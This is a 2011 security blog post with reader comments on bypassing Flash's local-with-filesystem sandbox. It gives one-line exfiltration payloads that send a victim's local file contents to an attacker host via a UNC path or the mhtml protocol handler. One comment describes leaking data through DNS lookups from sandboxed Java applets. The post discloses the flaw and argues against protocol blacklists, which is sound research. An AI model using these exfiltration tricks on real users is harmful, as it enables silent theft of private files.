Billy (BK) Rios » Bypassing Flash’s local-with-filesystem Sandbox

Tuesday, January 4th, 2011

Bypassing Flash’s local-with-filesystem Sandbox

A few weeks ago, I posted a description of a set of bugs that could be chained together to do “bad things”. In the PoC I provided, a SWF file reads an arbitrary file from the victim’s local file system and passes the stolen content to an attacker’s server.

One of the readers (PZ) had a question about the SWFs local-with-filesystem sandbox, which should prevent SWFs loaded from the local file system from passing data to remote systems. Looking at the documentation related to the sandbox, we see the following:

Local file describes any file that is referenced by using the
file:
protocol or a Universal Naming Convention (UNC) path. Local SWF files are placed into one of four local sandboxes:

The local-with-filesystem sandbox—For security purposes, Flash Player places all local SWF files and assets in the local-with-file-system sandbox, by default. From this sandbox, SWF files can read local files (by using the URLLoader class, for example), but they cannot communicate with the network in any way. This assures the user that local data cannot be leaked out to the network or otherwise inappropriately shared.

First, I think the documentation here is a bit too generous. SWFs loaded from the local file system do face some restrictions. The most relevant restrictions are probably:

The SWF cannot make a call to JavaScript (or vbscript), either through URL or ExternalInterface
The SWF cannot call a HTTP or HTTPS request.
Querystring parameters (ex. Blah.php?querystring=qs-value) are stripped and will not be passed (even for requests to local files)

Unfortunately, these restrictions are not the same as, “cannot communicate with the network in any way” which is what is stated in the documentation. The simplest way to bypass the local-with-filesystem sandbox is to simply use a file:// request to a remote server. For example, after loading the content from the local file system an attacker can simply pass the contents to the attacker server via getURL() and a url like: file://\\192.168.1.1\stolen-data-here\

Fortunately, it seems you can only pass IPs and hostnames for system on the local network (RFC 1918 addresses). If an attacker wants to send data to a remote server on the Internet we’ll have to resort to a couple other tricks. A while back, I put up a post on the dangers of blacklisting protocol handlers. It’s basically impossible to create a list of “bad” protocol handlers in siutation like this. In the case of the local-with-filesystem sandbox, Adobe has decided to prevent network access through the use of protocol handler blacklists. If we can find a protocol handler that hasn’t been blacklisted by Adobe and allows for network communication, we win.

There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example. The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash. Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:

getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);

Some other benefits for using the mhtml protocol handler are:

The request goes over http/https and port 80/443 so it will get past most egress filtering
If the request results in a 404, it will silently fail. The data will still be transmitted to the attackers server, but the victim will never see an indication of the transfer
The protocol handler is available by default on Win7 and will launch with no protocol handler warning

There you go, an easy way to bypass Flash’s local-with-file system sandbox. Two lessons here. One, running un-trusted code (whether it’s an executable, javascript, or even a swf) is dangerous. Two, protocol handler blacklists are bad. Hope this helps PZ!

Posted by xssniper | Filed in Security

http://www.thespanner.co.uk/ Gareth Heyes

Sweet, you are a schemer dude
http://www.andlabs.org lava

I did some work on this sometime back and also released a Whitepaper [http://www.andlabs.org/whitepapers/F_IE_PrisonBreak.pdf] and a tool which extracted files from the harddisk. But I used the more simpler method – \\192.168.1.1\stolen-data-here\

Using mhtml is a very clever approach!

Couple of points:
1) This still requires the attacker to have some kind of access to the internal network since the Flash file must be loaded from within the LAN. In this case does being able to send the output to a remote system have any clear advantage?

2) Someone who read my whitepaper sent me an e-mail mentioning that he was able to send the data to remote systems using DNS tunneling. Am wondering if this would work since you mention that only hostnames from local network can be called. Any thoughts?

Thanks.
http://metasploit.com/ HD

A fun trick I use for exfiltrating data from Java is the gethostname() call. The sandbox prevents the caller from seeing the results of the lookup, but it doesn’t prevent the lookup from occurring. You can send any data you like out via DNS queries from a sandboxed Java applet. We used this in the Decloak.net code today.
ben

I recently research some flash security,but when I public the swf to the web,it couldn’t visit local files.Could you send me the .fla?
Pingback: Flash Player sandbox can be bypassed
Pingback: .:: Securnetwork.net Blog – Massimo Rabbi ::. » Macromedia Flash: occhio al filesystem!
Pingback: Bypass Flash Player Sandbox
Pingback: Why Blacklist Destinations? « Aggressive Virus Defense
Pingback: Sandbox van Flash is te omzeilen. | celar.nl
Pingback: باحث أمني يتوصل إلى طريقة لتجاوز الـ Sandbox الخاص بـ Flash Player | المجلة التقنية
Pingback: Researcher breaks security sandbox in Adobe Flash bypassing security with mhtml
Pingback: Information: Researcher breaks security sandbox in Adobe | DhanyWeb.com
Pingback: Security researcher finds way around Flash sandbox | World news
Pingback: Descubren un método para hackear archivos de Adobe Flash « Logic Security 2.0
Pingback: Researcher Bypasses Flash Sandbox Security | eWEEK Europe UK
Pingback: Bypass the Security Sandbox! « Domy Incorporation
Pingback: Descubierta la primera vulnerabilidad de Adobe Reader X en Bitelia (Multimedia)
Pingback: Adobe Circus: Another Flash In The Pan
Pingback: Descubierta la primera vulnerabilidad de Adobe Reader X « BN
Pingback: Исследователь взломал песочницу Adobe Flash
Pingback: Исследователь взломал песочницу Adobe Flash « Serval_Master
Pingback: Security researcher finds way around Flash sandbox |
Tom R

So, er, at the moment, do you think it’s better to stick with 9.4.1 (current setup) or better to move to X? Or something else entirely?
Pingback: IISB 01/13/2011
Pingback: Adobe’s Flash Sandbox Not So Secure After All
http://www.80vul.com/ superhei

http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt
Allan Smithie

this is bunk

file://\\192.168.1.1\stolen-data-here\

and

mhtml:http://attacker-server.com/stolen-data-here

will throw a streamerror with or without sandbox
with a URLRequest.

These are just invalid urls and dont do a thing.

and by the way the getURL method you are using is as2 and will just open a browser window which will probaly also fail to parse the urls.

You just put some fancy security terminology together to make a blogpost.

At least have the guts to provide us some serious sourcefiles or examplecode to look at.
Pingback: PTSec – Portal de Segurança Português » Top Ataques Web 2011
Pingback: Vota por las principales técnicas de hacking web de 2011 | Sevilla Sec&Beer
Pingback: Top Web Hacking Techniques of 2011 | MYH3R3